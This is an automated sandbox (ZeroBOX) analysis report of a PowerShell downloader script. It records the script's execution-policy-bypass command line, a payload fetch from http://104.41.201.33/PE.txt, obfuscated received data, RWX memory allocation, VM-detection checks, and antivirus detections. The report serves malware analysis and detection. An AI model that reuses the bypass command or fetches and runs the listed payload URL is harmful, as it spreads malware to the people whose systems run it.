Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Nov. 5, 2021, 9:27 a.m.	Nov. 5, 2021, 9:29 a.m.

Size	5.1KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`398676189544dc8480ecb361490f2c1d`
SHA256	`82a09aca4264e6507c42687ed8985623cd5db13460a5855632d09c1da1eedd3d`
CRC32	`E4A1444F`
ssdeep	`96:g2+dz8qVsVulmO7UIO1mWO7UI3myA2+rz42+Jz2CHDuCXDWVsVt2NB3MX:IWAmVI8y`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\bypass.txt.ps1
1860

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
104.41.201.33	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 104.41.201.33:80 -> 192.168.56.102:49165	2020482	ET WEB_CLIENT DRIVEBY GENERIC ShellExecute in Hex No Seps	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Nov. 5, 2021, 9:27 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (21 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 5, 2021, 9:27 a.m.	buffer: Invoke-Expression : Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW Nov. 5, 2021, 9:27 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\bypass.txt.ps1:4 char:18 console_handle: 0x0000002f	1	1
WriteConsoleW Nov. 5, 2021, 9:27 a.m.	buffer: + Invoke-Expression <<<< $cc console_handle: 0x0000003b	1	1
WriteConsoleW Nov. 5, 2021, 9:27 a.m.	buffer: + CategoryInfo : ParserError: ((:String) [Invoke-Expression], Par console_handle: 0x00000047	1	1
WriteConsoleW Nov. 5, 2021, 9:27 a.m.	buffer: seException console_handle: 0x00000053	1	1
WriteConsoleW Nov. 5, 2021, 9:27 a.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken,Microsoft.PowerShell.Commands.In console_handle: 0x0000005f	1	1
WriteConsoleW Nov. 5, 2021, 9:27 a.m.	buffer: vokeExpressionCommand console_handle: 0x0000006b	1	1
WriteConsoleW Nov. 5, 2021, 9:27 a.m.	buffer: Set-Content : Could not find a part of the path 'C:\Users\Public\Run\Run.BAT'. console_handle: 0x0000001b	1	1
WriteConsoleW Nov. 5, 2021, 9:27 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\bypass.txt.ps1:16 char:12 console_handle: 0x00000027	1	1
WriteConsoleW Nov. 5, 2021, 9:27 a.m.	buffer: + Set-Content <<<< -Path C:\Users\Public\Run\Run.BAT -Value $Content console_handle: 0x00000033	1	1
WriteConsoleW Nov. 5, 2021, 9:27 a.m.	buffer: + CategoryInfo : ObjectNotFound: (C:\Users\Public\Run\Run.BAT:Str console_handle: 0x0000003f	1	1
WriteConsoleW Nov. 5, 2021, 9:27 a.m.	buffer: ing) [Set-Content], DirectoryNotFoundException console_handle: 0x0000004b	1	1
WriteConsoleW Nov. 5, 2021, 9:27 a.m.	buffer: + FullyQualifiedErrorId : GetContentWriterDirectoryNotFoundError,Microsoft console_handle: 0x00000057	1	1
WriteConsoleW Nov. 5, 2021, 9:27 a.m.	buffer: .PowerShell.Commands.SetContentCommand console_handle: 0x00000063	1	1
WriteConsoleW Nov. 5, 2021, 9:28 a.m.	buffer: Invoke-Expression : Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW Nov. 5, 2021, 9:28 a.m.	buffer: At line:1 char:18 console_handle: 0x0000002f	1	1
WriteConsoleW Nov. 5, 2021, 9:28 a.m.	buffer: + Invoke-Expression <<<< $RDTFYGUIHJODRGFHTGYJH console_handle: 0x0000003b	1	1
WriteConsoleW Nov. 5, 2021, 9:28 a.m.	buffer: + CategoryInfo : ParserError: ((:String) [Invoke-Expression], Par console_handle: 0x00000047	1	1
WriteConsoleW Nov. 5, 2021, 9:28 a.m.	buffer: seException console_handle: 0x00000053	1	1
WriteConsoleW Nov. 5, 2021, 9:28 a.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken,Microsoft.PowerShell.Commands.In console_handle: 0x0000005f	1	1
WriteConsoleW Nov. 5, 2021, 9:28 a.m.	buffer: vokeExpressionCommand console_handle: 0x0000006b	1	1

Uses Windows APIs to generate a cryptographic key (11 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 5, 2021, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05092600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05092600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05092600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05092600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05092600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05092600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05092600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05092600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05092600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05092600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05092600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 5, 2021, 9:27 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://104.41.201.33/PE.txt

Performs some HTTP requests (1 event)

request

GET http://104.41.201.33/PE.txt

Allocates read-write-execute memory (usually to unpack itself) (33 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0202b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0203f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02009000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06480000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06481000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06482000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06483000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06484000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06485000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06260000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06261000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06262000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06263000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06264000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06265000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05541000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06266000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06267000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0200d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:27 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02962000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:28 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05556000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:28 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:28 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05558000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:28 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 5, 2021, 9:28 a.m.	process_identifier: 1860 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06486000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 5, 2021, 9:27 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (3 events)

Data received	E`1```4`2`27B9E`1```46FC8`````A7D9F`1```42A82`27BA1`1```4183B`D```````22894`````6`2187DA1`1```4`22895`````62A82`27BA1`1```4193B`D```````22894`````6`2197DA1`1```4`22895`````62A1E`22899`````62A52`2`38C8D`````17DA``1```4`21B7DA1`1```42A52`2`38CB3`````17DA``1```4`21C7DA1`1```42A42`2`37DA``1```4`21F`B7DA1`1```42A52`22899`````625`37D9E`1```4`46FAA`````62A56`22899`````625`37D9E`1```4`46A6F9D`````62A56`22894`````6`2147DA``1```4`2177DA1`1```42A3E`2`37DA``1```4`21A7DA1`1```42A76`27BA``1```43A`6``````7217`3``7`2A`27BA``1```46F3D`````A2A52`21D7DA1`1```4`2`38C91`````17DA``1```42A56`21F`97DA1`1```4`2`38CB5`````17DA``1```42A52`21E7DA1`1```4`2`38CB4`````17DA``1```42A1E`228AB`````62A22`2`328AA`````62A1E`228A``````62A22`2`3289D`````62A1E`228A1`````62A22`2`328AE`````62A1E`27BA1`1```42A32`27BA3`1```47388`````62A4A`27369`````A7DA3`1```4`2281B`````A2A3A`26F38`1```AD2`228C``````62A32`22`C```````6F26`1```A2A6A`22`CB``````6F26`1```A`2`32885`````6161E6F51`````A2A7E`22`CA``````6F26`1```A`2`32835`1```A2881`````6161A6F51`````A2A7A`339`C```````22`C3``````6F26`1```A2A`22`C2``````6F26`1```A2A1B3``2``27`1`````1````1116`A38`E``````2`E8`3````2817`````A`61758`A`67E1``````42818`````A32E528`3`````63A`6``````162819`````A``7E13`````4281A`````A39`5``````2838`````6DD`6``````26DD````````2863`````62868`````63A`6``````162819`````ADD`6``````26DD``````````7E12`````4281A`````A39`5``````282C`````6DD`6``````26DD``````````7E`E`````4281A`````A39`F``````2849`````639`5``````286F`````6DD`6``````26DD``````````7E`4`````4281A`````A39`5``````2828`````6DD`6``````26DD````````284F`````62849`````639`5``````2851`````6DD`6``````26DD``````````2812`````63A`A``````281E`````6281B`````6DD`6``````26DD````````2`8813````2817`````A2BD4```158````````33``194C```6`1`````1````57``156C```6`1`
Data received	-0`38`35`32`31`-0`-0`-0`-0`44`38`32`42`-0`-0`-0`-0`3-`31`32`33`-0`-0`-0`-0`42`43`-0`43`-0`-0`-0`-0`3-`4-`-0`38`-0`-0`-0`-0`33`44`33`-0`-0`-0`-0`-0`37`35`-0`39`-0`-0`-0`-0`35`3-`31`37`-0`-0`-0`-0`4-`42`32`4-`-0`-0`-0`-0`39`-0`-0`42`-0`-0`-0`-0`-0`-0`32`4-`-0`-0`-0`-0`33`3-`-0`37`-0`-0`-0`-0`43`-0`32`4-`-0`-0`-0`-0`37`44`-0`37`-0`-0`-0`-0`34`39`-0`4-`-0`-0`-0`-0`41`41`-0`41`-0`-0`-0`-0`42`3-`-0`3-`-0`-0`-0`-0`42`38`31`3-`-0`-0`-0`-0`44`3-`32`32`-0`-0`-0`-0`44`32`31`41`-0`-0`-0`-0`41`-0`32`41`-0`-0`-0`-0`43`35`32`31`-0`-0`-0`-0`44`42`32`35`-0`-0`-0`-0`35`42`31`39`-0`-0`-0`-0`33`44`-0`-0`-0`-0`-0`-0`34`31`31`4-`-0`-0`-0`-0`42`42`31`38`-0`-0`-0`-0`3-`43`32`31`-0`-0`-0`-0`3-`42`-0`41`-0`-0`-0`-0`43`31`-0`34`-0`-0`-0`-0`-0`44`32`33`-0`-0`-0`-0`39`34`31`44`-0`-0`-0`-0`45`42`31`39`-0`-0`-0`-0`33`-0`31`43`-0`-0`-0`-0`39`44`33`31`-0`-0`-0`-0`-0`33`31`35`-0`-0`-0`-0`-0`32`32`37`-0`-0`-0`-0`35`34`31`43`-0`-0`-0`-0`39`-0`31`34`-0`-0`-0`-0`39`35`-0`-0`-0`-0`-0`-0`44`37`-0`4-`-0`-0`-0`-0`-0`44`33`31`-0`-0`-0`-0`-0`35`31`38`-0`-0`-0`-0`43`38`33`33`-0`-0`-0`-0`33`34`31`41`-0`-0`-0`-0`32`45`-0`38`-0`-0`-0`-0`39`4-`31`37`-0`-0`-0`-0`42`41`32`38`-0`-0`-0`-0`38`38`31`42`-0`-0`-0`-0`32`4-`31`34`-0`-0`-0`-0`3-`32`-0`45`-0`-0`-0`-0`44`33`31`31`-0`-0`-0`-0`33`33`-0`42`-0`-0`-0`-0`39`31`32`35`-0`-0`-0`-0`34`43`-0`41`-0`-0`-0`-0`37`33`31`31`-0`-0`-0`-0`34`35`32`39`-0`-0`-0`-0`45`38`33`32`-0`-0`-0`-0`3-`38`-0`34`-0`-0`-0`-0`4-`42`-0`-0`-0`-0`-0`-0`38`38`31`4-`-0`-0`-0`-0`32`42`32`45`-0`-0`-0`-0`37`39`33`33`-0`-0`-0`-0`34`41`-0`45`-0`-0`-0`-0`32`-0`-0`35`-0`-0`-0`-0`38`-0`-0`34`-0`-0`-0`-0`45`43`32`43`-0`-0`-0`-0`3-`43`32`41`-0`-0`-0`-0`-0`41`32`31`-0`-0`-0`-0`35`43`32`4-`-0`-0`-0`-0`33`34`32`41`-0`-0`-0`-0`44`43`-0`31`-0`-0`-0`-0`37`32`-0`32`-0`-0`-0`-0`41`44`-0`42`-0`-0`-0`-0`44`42`-0`43`-0`-0`-0`-0`34`45`31`33`-0`-0`-0`-0`32`-0`32`42`-0`-0`-0`-0`41`43`32`45`-0`-0`-0`-0`-0`42`31`44`-0`-0`-0`-0`45`31`-0`44`-0`-0`-0`-0`4-`39`-0`39`-0`-0`-0`-0`31`3-`31`4-`-0`-0`-0`-0`-0`3-`-0`38`-0`-0`-0`-0`34`3-`31`42`-0`-0`-0`-0`34`45`32`34`-0`-0`-0`-0`43`32`32`35`-0`-0`-0`-0`3-`37`33`32`-0`-0`-0`-0`42`3-`31`45`-0`-0`-0`-0`45`33`-0`-0`-0`-0`-0`-0`3-`32`-0`42`-0`-0`-0`-0`38`34`-0`32`-0`-0`-0`-0`37`34`31`39`-0`-0`-0`-0`33`39`32`-0`-0`-0`-0`-0`32`44`32`31`-0`-0`-0`-0`4-`-0`31`4-`-0`-0`-0`-0`43`31`31`34`-0`-0`-0`-0`38`32`32`3-`-0`-0`-0`-0`33`33`33`33`-0`-0`-0`-0`3-`-0`32`44`-0`-0`-0`-0`45`34`-0`45`-0`-0`-0`-0`43`43`31`39`-0`-0`-0`-0`43`31`-0`39`-0`-0`-0`-0`31`45`31`-0`-0`-0`-0`-0`44`3-`-0`42`-0`-0`-0`-0`31`41`33`32`-0`-0`-0`-0`31`41`31`42`-0`-0`-0`-0`38`37`31`32`-0`-0`-0`-0`44`38`31`32`-0`-0`-0`-0`37`31`-0`42`-0`-0`-0`-0`31`39`32`35`-0`-0`-0`-0`39`38`31`33`-0`-0`-0`-0`42`33`31`41`-0`-0`-0`-0`31`41`32`37`-0`-0`-0`-0`33`45`32`33`-0`-0`-0`-0`31`31`32`34`-0`-0`-0`-0`42`44`-0`38`-0`-0`-0`-0`44`-0`32`37`-0`-0`-0`-0`4-`43`32`41`-0`-0`-0`-0`42`42`-0`35`-0`-0`-0`-0`41`31`32`33`-0`-0`-0`-0`31`32`31`31`-0`-0`-0`-0`32`31`-0`39`-0`-0`-0`-0`38`39`31`41`-0`-0`-0`-0`32`42`33`32`-0`-0`-0`-0`37`31`31`34`-0`-0`-0`-0`37`38`-0`3-`-0`-0`-0`-0`-0`43`-0`37`-0`-0`-0`-0`39`4-`31`-0`-0`-0`-0`-0`-0`43`-0`4-`-0`-0`-0`-0`-0`31`32`32`-0`-0`-0`-0`44`33`32`34`-0`-0`-0`-0`33`39`32`37`-0`-0`-0`-0`-0`35`32`44`-0`-0`-0`-0`31`-0`31`32`-0`-0`-0`-0`33`33`31`32`-0`-0`-0`-0`39`39`32`44`-0`-0`-0`-0`37`31`31`44`-0`-0`-0`-0`39`-0`33`-0`-0`-0`-0`-0`34`44`-0`-0`-0`-0`-0`-0`37`39`31`3-`-0`-0`-0`-0`39`37`31`38`-0`-0`-0`-0`45`42`31`34`-0`-0`-0`-0`-
Data received	`34`31`37`34`37`34`37`32`3-`39`3-`32`37`35`37`34`3-`35`-0`-0`34`34`3-`35`3-`32`37`35`3-`37`3-`37`3-`31`3-`32`3-`43`3-`35`34`31`37`34`37`34`37`32`3-`39`3-`32`37`35`37`34`3-`35`-0`-0`35`33`37`39`37`33`37`34`3-`35`3-`44`32`45`34`34`3-`39`3-`31`3-`37`3-`45`3-`4-`37`33`37`34`3-`39`3-`33`37`33`-0`-0`34`34`3-`35`3-`32`37`35`3-`37`3-`37`3-`39`3-`45`3-`37`34`44`3-`4-`3-`34`3-`35`37`33`-0`-0`34`31`37`33`37`33`3-`35`3-`44`3-`32`3-`43`37`39`35`34`3-`39`37`34`3-`43`3-`35`34`31`37`34`37`34`37`32`3-`39`3-`32`37`35`37`34`3-`35`-0`-0`35`33`37`39`37`33`37`34`3-`35`3-`44`32`45`35`32`3-`35`3-`3-`3-`43`3-`35`3-`33`37`34`3-`39`3-`4-`3-`45`-0`-0`35`33`37`34`37`32`3-`39`3-`45`3-`37`-0`-0`34`31`37`33`37`33`3-`35`3-`44`3-`32`3-`43`37`39`34`34`3-`35`37`33`3-`33`37`32`3-`39`37`-0`37`34`3-`39`3-`4-`3-`45`34`31`37`34`37`34`37`32`3-`39`3-`32`37`35`37`34`3-`35`-0`-0`34`31`37`33`37`33`3-`35`3-`44`3-`32`3-`43`37`39`34`33`3-`4-`3-`44`37`-0`3-`31`3-`45`37`39`34`31`37`34`37`34`37`32`3-`39`3-`32`37`35`37`34`3-`35`-0`-0`34`31`37`33`37`33`3-`35`3-`44`3-`32`3-`43`37`39`35`-0`37`32`3-`4-`3-`34`37`35`3-`33`37`34`34`31`37`34`37`34`37`32`3-`39`3-`32`37`35`37`34`3-`35`-0`-0`34`31`37`33`37`33`3-`35`3-`44`3-`32`3-`43`37`39`34`33`3-`4-`37`-0`37`39`37`32`3-`39`3-`37`3-`38`37`34`34`31`37`34`37`34`37`32`3-`39`3-`32`37`35`37`34`3-`35`-0`-0`34`31`37`33`37`33`3-`35`3-`44`3-`32`3-`43`37`39`35`34`37`32`3-`31`3-`34`3-`35`3-`44`3-`31`37`32`3-`42`34`31`37`34`37`34`37`32`3-`39`3-`32`37`35`37`34`3

Poweshell is sending data to a remote host (1 event)

Data sent

GET /PE.txt HTTP/1.1 Host: 104.41.201.33 Connection: Keep-Alive

Communicates with host for which no DNS query was performed (1 event)

host

104.41.201.33

File has been identified by 14 AntiVirus engines on VirusTotal as malicious (14 events)

DrWeb	PowerShell.DownLoader.1457
MicroWorld-eScan	Trojan.Script.GenericKDZ.3517
FireEye	Trojan.Script.GenericKDZ.3517
Arcabit	Trojan.Script.Generic.DDBD
Cyren	PSH/Agent.CL
Avast	Script:SNH-gen [Trj]
BitDefender	Trojan.Script.GenericKDZ.3517
Ad-Aware	Trojan.Script.GenericKDZ.3517
Emsisoft	Trojan.Script.GenericKDZ.3517 (B)
MAX	malware (ai score=85)
GData	Trojan.Script.GenericKDZ.3517
ALYac	Trojan.Script.GenericKDZ.3517
Ikarus	Trojan.PS.Agent
AVG	Script:SNH-gen [Trj]

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Nov. 5, 2021, 9:27 a.m.	buffer: GET /PE.txt HTTP/1.1 Host: 104.41.201.33 Connection: Keep-Alive socket: 1484 sent: 69	1	69	0

bypass.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All